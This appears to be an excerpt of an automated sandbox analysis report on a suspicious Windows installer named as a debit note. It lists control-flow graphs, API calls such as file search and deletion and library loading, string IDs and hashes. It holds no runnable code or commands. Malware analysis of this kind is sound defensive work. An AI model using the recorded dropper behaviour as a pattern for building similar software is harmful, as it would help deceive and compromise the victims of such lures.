                                control_flow_graph 480 4057d0-4057f6 call 405a9b 483 4057f8-40580a DeleteFileW 480->483 484 40580f-405816 480->484 485 40598c-405990 483->485 486 405818-40581a 484->486 487 405829-405839 call 405f48 484->487 489 405820-405823 486->489 490 40593a-40593f 486->490 493 405848-405849 call 4059df 487->493 494 40583b-405846 lstrcatW 487->494 489->487 489->490 490->485 492 405941-405944 490->492 495 405946-40594c 492->495 496 40594e-405956 call 40628b 492->496 497 40584e-405852 493->497 494->497 495->485 496->485 504 405958-40596c call 405993 call 405788 496->504 500 405854-40585c 497->500 501 40585e-405864 lstrcatW 497->501 500->501 503 405869-405885 lstrlenW FindFirstFileW 500->503 501->503 505 40588b-405893 503->505 506 40592f-405933 503->506 520 405984-405987 call 4051f2 504->520 521 40596e-405971 504->521 509 4058b3-4058c7 call 405f48 505->509 510 405895-40589d 505->510 506->490 508 405935 506->508 508->490 522 4058c9-4058d1 509->522 523 4058de-4058e9 call 405788 509->523 512 405912-405922 FindNextFileW 510->512 513 40589f-4058a7 510->513 512->505 517 405928-405929 FindClose 512->517 513->509 518 4058a9-4058b1 513->518 517->506 518->509 518->512 520->485 521->495 524 405973-405982 call 4051f2 call 405de2 521->524 522->512 525 4058d3-4058dc call 4057d0 522->525 533 40590a-40590d call 4051f2 523->533 534 4058eb-4058ee 523->534 524->485 525->512 533->512 537 4058f0-405900 call 4051f2 call 405de2 534->537 538 405902-405908 534->538 537->512 538->512
                                APIs
                                • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,77222EE0,"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe"), ref: 004057F9
                                • lstrcatW.KERNEL32(Antegrade\Fravristelse213.Sto226,\*.*,Antegrade\Fravristelse213.Sto226,?,?,C:\Users\user\AppData\Local\Temp\,77222EE0,"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe"), ref: 00405841
                                • lstrcatW.KERNEL32(?,00409014,?,Antegrade\Fravristelse213.Sto226,?,?,C:\Users\user\AppData\Local\Temp\,77222EE0,"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe"), ref: 00405864
                                • lstrlenW.KERNEL32(?,?,00409014,?,Antegrade\Fravristelse213.Sto226,?,?,C:\Users\user\AppData\Local\Temp\,77222EE0,"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe"), ref: 0040586A
                                • FindFirstFileW.KERNELBASE(Antegrade\Fravristelse213.Sto226,?,?,?,00409014,?,Antegrade\Fravristelse213.Sto226,?,?,C:\Users\user\AppData\Local\Temp\,77222EE0,"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe"), ref: 0040587A
                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 0040591A
                                • FindClose.KERNEL32(00000000), ref: 00405929
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                • String ID: "C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe"$Antegrade\Fravristelse213.Sto226$C:\Users\user\AppData\Local\Temp\$\*.*
                                • API String ID: 2035342205-338424149
                                • Opcode ID: 42d14f137d7c51639dd5450d77468bfd9c1695374b56492c5285f64ee032ed7a
                                • Instruction ID: 2292a97837c012d07e09995a86319137dd3f2048718c0aa8a22e23afcdeedbd0
                                • Opcode Fuzzy Hash: 42d14f137d7c51639dd5450d77468bfd9c1695374b56492c5285f64ee032ed7a
                                • Instruction Fuzzy Hash: BF41C171800914EACF217B668C49BBF7678EB81328F24817BF811761D1D77C4E829E6E
                                APIs
                                • FindFirstFileW.KERNELBASE(?,00425738,Antegrade\Fravristelse213.Sto226,00405AE4,Antegrade\Fravristelse213.Sto226,Antegrade\Fravristelse213.Sto226,00000000,Antegrade\Fravristelse213.Sto226,Antegrade\Fravristelse213.Sto226,?,?,77222EE0,004057F0,?,C:\Users\user\AppData\Local\Temp\,77222EE0), ref: 00406296
                                • FindClose.KERNEL32(00000000), ref: 004062A2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: Find$CloseFileFirst
                                • String ID: 8WB$Antegrade\Fravristelse213.Sto226
                                • API String ID: 2295610775-220311181
                                • Opcode ID: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                • Instruction ID: bfad84801e56aa45620b307e7a8f789e26230cc956ed9d1a225fdef78671a1f1
                                • Opcode Fuzzy Hash: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                • Instruction Fuzzy Hash: A7D01231A59020ABC6003B38AD0C84B7A989B553317224AB6F426F63E0C37C8C66969D
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a31c6952aff2c2d9e3077db5cda77fcb20a4fa1314c68fe29834e6b9dbef6b62
                                • Instruction ID: 2d3234ddcc30eb1b928d1b3f6e05ca322d860fc2e9c12c5c13e3e91ce8371178
                                • Opcode Fuzzy Hash: a31c6952aff2c2d9e3077db5cda77fcb20a4fa1314c68fe29834e6b9dbef6b62
                                • Instruction Fuzzy Hash: 74F17571D04229CBCF28CFA8C8946ADBBB1FF44305F25856ED456BB281D3785A96CF44
                                APIs
                                • GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
                                • LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000009), ref: 004062CF
                                • GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: AddressHandleLibraryLoadModuleProc
                                • String ID:
                                • API String ID: 310444273-0
                                • Opcode ID: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                • Instruction ID: 6db28869a22d2b590e25977263656b8717a92efcd7e963286bbc5c179789795b
                                • Opcode Fuzzy Hash: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                • Instruction Fuzzy Hash: F2E0C236E0C120ABC7225B209E4896B73ACAFE9651305043EF506F6280C774EC229BE9

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 174 403cc2-403cd4 175 403e15-403e24 174->175 176 403cda-403ce0 174->176 177 403e73-403e88 175->177 178 403e26-403e6e GetDlgItem * 2 call 40419a SetClassLongW call 40140b 175->178 176->175 179 403ce6-403cef 176->179 183 403ec8-403ecd call 4041e6 177->183 184 403e8a-403e8d 177->184 178->177 180 403cf1-403cfe SetWindowPos 179->180 181 403d04-403d07 179->181 180->181 185 403d21-403d27 181->185 186 403d09-403d1b ShowWindow 181->186 196 403ed2-403eed 183->196 188 403ec0-403ec2 184->188 189 403e8f-403e9a call 401389 184->189 191 403d43-403d46 185->191 192 403d29-403d3e DestroyWindow 185->192 186->185 188->183 195 404167 188->195 189->188 211 403e9c-403ebb SendMessageW 189->211 202 403d48-403d54 SetWindowLongW 191->202 203 403d59-403d5f 191->203 200 404144-40414a 192->200 199 404169-404170 195->199 197 403ef6-403efc 196->197 198 403eef-403ef1 call 40140b 196->198 207 403f02-403f0d 197->207 208 404125-40413e DestroyWindow EndDialog 197->208 198->197 200->195 205 40414c-404152 200->205 202->199 209 403e02-403e10 call 404201 203->209 210 403d65-403d76 GetDlgItem 203->210 205->195 212 404154-40415d ShowWindow 205->212 207->208 213 403f13-403f60 call 405f6a call 40419a * 3 GetDlgItem 207->213 208->200 209->199 214 403d95-403d98 210->214 215 403d78-403d8f SendMessageW IsWindowEnabled 210->215 211->199 212->195 244 403f62-403f67 213->244 245 403f6a-403fa6 ShowWindow KiUserCallbackDispatcher call 4041bc EnableWindow 213->245 218 403d9a-403d9b 214->218 219 403d9d-403da0 214->219 215->195 215->214 222 403dcb-403dd0 call 404173 218->222 223 403da2-403da8 219->223 224 403dae-403db3 219->224 222->209 226 403de9-403dfc SendMessageW 223->226 229 403daa-403dac 223->229 225 403db5-403dbb 224->225 224->226 230 403dd2-403ddb call 40140b 225->230 231 403dbd-403dc3 call 40140b 225->231 226->209 229->222 230->209 241 403ddd-403de7 230->241 240 403dc9 231->240 240->222 241->240 244->245 248 403fa8-403fa9 245->248 249 403fab 245->249 250 403fad-403fdb GetSystemMenu EnableMenuItem SendMessageW 248->250 249->250 251 403ff0 250->251 252 403fdd-403fee SendMessageW 250->252 253 403ff6-404034 call 4041cf call 405f48 lstrlenW call 405f6a SetWindowTextW call 401389 251->253 252->253 253->196 262 40403a-40403c 253->262 262->196 263 404042-404046 262->263 264 404065-404079 DestroyWindow 263->264 265 404048-40404e 263->265 264->200 267 40407f-4040ac CreateDialogParamW 264->267 265->195 266 404054-40405a 265->266 266->196 268 404060 266->268 267->200 269 4040b2-404109 call 40419a GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 267->269 268->195 269->195 274 40410b-40411e ShowWindow call 4041e6 269->274 276 404123 274->276 276->200
                                APIs
                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CFE
                                • ShowWindow.USER32(?), ref: 00403D1B
                                • DestroyWindow.USER32 ref: 00403D2F
                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D4B
                                • GetDlgItem.USER32(?,?), ref: 00403D6C
                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D80
                                • IsWindowEnabled.USER32(00000000), ref: 00403D87
                                • GetDlgItem.USER32(?,00000001), ref: 00403E35
                                • GetDlgItem.USER32(?,00000002), ref: 00403E3F
                                • SetClassLongW.USER32(?,000000F2,?), ref: 00403E59
                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403EAA
                                • GetDlgItem.USER32(?,00000003), ref: 00403F50
                                • ShowWindow.USER32(00000000,?), ref: 00403F71
                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F83
                                • EnableWindow.USER32(?,?), ref: 00403F9E
                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403FB4
                                • EnableMenuItem.USER32(00000000), ref: 00403FBB
                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403FD3
                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403FE6
                                • lstrlenW.KERNEL32(004226E8,?,004226E8,00428200), ref: 0040400F
                                • SetWindowTextW.USER32(?,004226E8), ref: 00404023
                                • ShowWindow.USER32(?,0000000A), ref: 00404157
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                • String ID: &B
                                • API String ID: 3282139019-3208460036
                                • Opcode ID: df49f6763b05bfa84c1d779e4394ea7a5d72abe941678efbb561a9aecc95dd19
                                • Instruction ID: 615a13079a357bc63dc92eaebf5b97e46402dd0953b19927b77141fc7a078d9b
                                • Opcode Fuzzy Hash: df49f6763b05bfa84c1d779e4394ea7a5d72abe941678efbb561a9aecc95dd19
                                • Instruction Fuzzy Hash: B6C1A371A04201BBDB216F61ED49E2B3AA8FB95705F40093EF601B51F1C7799892DB2E

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 277 40391f-403937 call 4062b2 280 403939-403944 GetUserDefaultUILanguage call 405e8f 277->280 281 40394b-403982 call 405e15 277->281 285 403949 280->285 286 403984-403995 call 405e15 281->286 287 40399a-4039a0 lstrcatW 281->287 288 4039a5-4039ce call 403bf5 call 405a9b 285->288 286->287 287->288 294 403a60-403a68 call 405a9b 288->294 295 4039d4-4039d9 288->295 301 403a76-403a9b LoadImageW 294->301 302 403a6a-403a71 call 405f6a 294->302 295->294 296 4039df-403a07 call 405e15 295->296 296->294 306 403a09-403a0d 296->306 304 403b1c-403b24 call 40140b 301->304 305 403a9d-403acd RegisterClassW 301->305 302->301 319 403b26-403b29 304->319 320 403b2e-403b39 call 403bf5 304->320 307 403ad3-403b17 SystemParametersInfoW CreateWindowExW 305->307 308 403beb 305->308 310 403a1f-403a2b lstrlenW 306->310 311 403a0f-403a1c call 4059c0 306->311 307->304 316 403bed-403bf4 308->316 313 403a53-403a5b call 405993 call 405f48 310->313 314 403a2d-403a3b lstrcmpiW 310->314 311->310 313->294 314->313 318 403a3d-403a47 GetFileAttributesW 314->318 322 403a49-403a4b 318->322 323 403a4d-403a4e call 4059df 318->323 319->316 329 403bc2-403bc3 call 4052c5 320->329 330 403b3f-403b5c ShowWindow LoadLibraryW 320->330 322->313 322->323 323->313 334 403bc8-403bca 329->334 332 403b65-403b77 GetClassInfoW 330->332 333 403b5e-403b63 LoadLibraryW 330->333 335 403b79-403b89 GetClassInfoW RegisterClassW 332->335 336 403b8f-403bb2 DialogBoxParamW call 40140b 332->336 333->332 338 403be4-403be6 call 40140b 334->338 339 403bcc-403bd2 334->339 335->336 340 403bb7-403bc0 call 40386f 336->340 338->308 339->319 341 403bd8-403bdf call 40140b 339->341 340->316 341->319
                                APIs
                                  • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
                                  • Part of subcall function 004062B2: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000009), ref: 004062CF
                                  • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                • GetUserDefaultUILanguage.KERNELBASE(00000002,C:\Users\user\AppData\Local\Temp\,77223420,00000000,"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe"), ref: 00403939
                                  • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                • lstrcatW.KERNEL32(1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\,77223420,00000000,"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe"), ref: 004039A0
                                • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\brugerlicensaftalerne,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A20
                                • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\brugerlicensaftalerne,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000), ref: 00403A33
                                • GetFileAttributesW.KERNEL32(Call), ref: 00403A3E
                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\brugerlicensaftalerne), ref: 00403A87
                                • RegisterClassW.USER32(004281A0), ref: 00403AC4
                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403ADC
                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B11
                                • ShowWindow.USER32(00000005,00000000), ref: 00403B47
                                • LoadLibraryW.KERNELBASE(RichEd20), ref: 00403B58
                                • LoadLibraryW.KERNEL32(RichEd32), ref: 00403B63
                                • GetClassInfoW.USER32(00000000,RichEdit20W,004281A0), ref: 00403B73
                                • GetClassInfoW.USER32(00000000,RichEdit,004281A0), ref: 00403B80
                                • RegisterClassW.USER32(004281A0), ref: 00403B89
                                • DialogBoxParamW.USER32(?,00000000,00403CC2,00000000), ref: 00403BA8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                • String ID: "C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\brugerlicensaftalerne$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$&B
                                • API String ID: 2262724009-172814157
                                • Opcode ID: 9ff61719f6c30c529665ce4dbc08b581b5599c43b58c29c5b92350d035ae6190
                                • Instruction ID: 309fb0296e4a6d1bba18aa3b2e86eaa258190dfd088e540a173f113b23667d40
                                • Opcode Fuzzy Hash: 9ff61719f6c30c529665ce4dbc08b581b5599c43b58c29c5b92350d035ae6190
                                • Instruction Fuzzy Hash: BE61B570644200BED720AF669C46F2B3A7CEB84749F40457FF945B62E2DB796902CA3D

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 347 402dbc-402e0a GetTickCount GetModuleFileNameW call 405bb4 350 402e16-402e44 call 405f48 call 4059df call 405f48 GetFileSize 347->350 351 402e0c-402e11 347->351 359 402f34-402f42 call 402d1a 350->359 360 402e4a-402e61 350->360 352 40305b-40305f 351->352 366 403013-403018 359->366 367 402f48-402f4b 359->367 362 402e63 360->362 363 402e65-402e72 call 4032f9 360->363 362->363 371 402e78-402e7e 363->371 372 402fcf-402fd7 call 402d1a 363->372 366->352 369 402f77-402fc3 GlobalAlloc call 4063ce call 405be3 CreateFileW 367->369 370 402f4d-402f65 call 40330f call 4032f9 367->370 397 402fc5-402fca 369->397 398 402fd9-403009 call 40330f call 403062 369->398 370->366 395 402f6b-402f71 370->395 376 402e80-402e98 call 405b6f 371->376 377 402efe-402f02 371->377 372->366 381 402f0b-402f11 376->381 394 402e9a-402ea1 376->394 380 402f04-402f0a call 402d1a 377->380 377->381 380->381 386 402f13-402f21 call 406360 381->386 387 402f24-402f2e 381->387 386->387 387->359 387->360 394->381 399 402ea3-402eaa 394->399 395->366 395->369 397->352 407 40300e-403011 398->407 399->381 400 402eac-402eb3 399->400 400->381 402 402eb5-402ebc 400->402 402->381 404 402ebe-402ede 402->404 404->366 406 402ee4-402ee8 404->406 408 402ef0-402ef8 406->408 409 402eea-402eee 406->409 407->366 410 40301a-40302b 407->410 408->381 411 402efa-402efc 408->411 409->359 409->408 412 403033-403038 410->412 413 40302d 410->413 411->381 414 403039-40303f 412->414 413->412 414->414 415 403041-403059 call 405b6f 414->415 415->352
                                APIs
                                • GetTickCount.KERNEL32 ref: 00402DD0
                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe,00000400), ref: 00402DEC
                                  • Part of subcall function 00405BB4: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe,80000000,00000003), ref: 00405BB8
                                  • Part of subcall function 00405BB4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe,C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe,80000000,00000003), ref: 00402E35
                                • GlobalAlloc.KERNELBASE(00000040,00409230), ref: 00402F7C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                • String ID: "C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                • API String ID: 2803837635-1225534506
                                • Opcode ID: dbc4309bf9e12582ea8865ce62b28691ef8d5c521c6be9f7d6ce07414c4970ed
                                • Instruction ID: b2cc58b1aa553f56ba66d3b0850f03698e33e3340d89f7fe3e9d1fe3a0eb5287
                                • Opcode Fuzzy Hash: dbc4309bf9e12582ea8865ce62b28691ef8d5c521c6be9f7d6ce07414c4970ed
                                • Instruction Fuzzy Hash: 43610371941205ABDB209FA4DD85B9E3BB8EB04354F20447BF605B72D2C7BC9E418BAD

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 544 401752-401777 call 402b3a call 405a0a 549 401781-401793 call 405f48 call 405993 lstrcatW 544->549 550 401779-40177f call 405f48 544->550 556 401798-401799 call 4061dc 549->556 550->556 559 40179e-4017a2 556->559 560 4017a4-4017ae call 40628b 559->560 561 4017d5-4017d8 559->561 569 4017c0-4017d2 560->569 570 4017b0-4017be CompareFileTime 560->570 563 4017e0-4017fc call 405bb4 561->563 564 4017da-4017db call 405b8f 561->564 571 401870-401899 call 4051f2 call 403062 563->571 572 4017fe-401801 563->572 564->563 569->561 570->569 586 4018a1-4018ad SetFileTime 571->586 587 40189b-40189f 571->587 573 401852-40185c call 4051f2 572->573 574 401803-401841 call 405f48 * 2 call 405f6a call 405f48 call 405724 572->574 584 401865-40186b 573->584 574->559 607 401847-401848 574->607 588 4029d0 584->588 590 4018b3-4018be CloseHandle 586->590 587->586 587->590 591 4029d2-4029d6 588->591 593 4018c4-4018c7 590->593 594 4029c7-4029ca 590->594 596 4018c9-4018da call 405f6a lstrcatW 593->596 597 4018dc-4018df call 405f6a 593->597 594->588 602 4018e4-402243 call 405724 596->602 597->602 602->591 607->584 609 40184a-40184b 607->609 609->573
                                APIs
                                • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\brugerlicensaftalerne\Isidora,?,?,00000031), ref: 00401793
                                • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\brugerlicensaftalerne\Isidora,?,?,00000031), ref: 004017B8
                                  • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F55
                                  • Part of subcall function 004051F2: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                  • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                  • Part of subcall function 004051F2: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                  • Part of subcall function 004051F2: SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                  • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
